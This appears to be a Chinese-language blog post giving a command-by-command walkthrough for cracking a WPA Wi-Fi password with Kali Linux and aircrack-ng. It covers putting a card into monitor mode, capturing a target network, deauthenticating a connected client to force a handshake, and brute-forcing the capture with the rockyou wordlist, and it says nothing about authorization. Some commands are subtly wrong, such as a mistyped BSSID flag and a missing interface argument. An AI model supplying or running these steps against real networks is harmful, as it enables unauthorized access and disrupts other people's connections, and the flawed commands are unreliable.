Kali Wifi

#停止当前网络服务

service network-manager stop

#停止有可能影响破解结果的进程

airmon-ng check kill

#查看无线网卡配置,这一步会找到无线网卡的名字,比如wlan0

iwconfig

#将无线网卡wlan0切换到monitor模式,如果网卡支持,网卡的名字会改变,比如从wlan0变为wlan0mon,如果网卡不支持,会有相关提示

airmon-ng start wlan0

#使用wlan0mon,监听周围可用无线网络。
#-a参数表示过滤掉所有unassociated的网络
#在屏幕下方列表中出现你准备破解的无线信号的bssid和chanel后,ctrl+c停止当前命令

airodump-ng -a wlan0mon

#单独监听准备破解的wifi, 假设需要监听的wifi的bssid=C4:4D:33:2B:5F:4A, chanel为11,则命令如下
#tmp为保存dump数据的文件名,生成的捕获数据文件为tmp-01.cap
#确保屏幕下方列表中有一个有效的station连接,并记录该station的id

airodump-ng –bbis C4:4D:33:2B:5F:4A -c 11 -w tmp wlan0mon

#不要停止上面的监听命令,新开一个命令行终端,假设以上得到的station id=00:01:02:03:04:05, 则运行以下命令

aireplay-ng -0 2 -a C4:4D:33:2B:5F:4A -c 00:01:02:03:04:05

#运行完以上命令后,查看在之前的airodump-ng的命令行是否出现wpa handshake的信息,如果出现,则说明成功取得包含密码的握手信息,否则过几分钟,重新执行aireplay-ng命令,如果一直不能成功握手,则建议换一个wifi

#得到wpa handshake信息后,就可以停止上面的airodump-ng命令了,下面就是利用密码字典进行破解了。
#在airodump-ng执行目录下,应该能找到tmp-01.cap文件
#kali内置了一些密码字典,在/usr/share/wordlists/, 使用该路径下的rockyou.txt(该文件可能需要先解压)应该可以cover大部分常用密码,不过好的密码字典,尤其是符合中国人习惯和目前手机使用的,还需要自己设计。
#在原来的airodump-ng命令行终端,运行以下命令

aircrack-ng tmp-01.cap -w /usr/share/wordlists/rockyou.txt

#下面就是看运气了,如果找到密码,会出现found key [**]这样结果,否则会出现paraphrase not in dictonary的结果。

参考1:
http://blog.csdn.net/descreekert/article/details/50748846
参考2:
http://blog.csdn.net/qq_20480611/article/details/50478672

你可能感兴趣的:(Kali)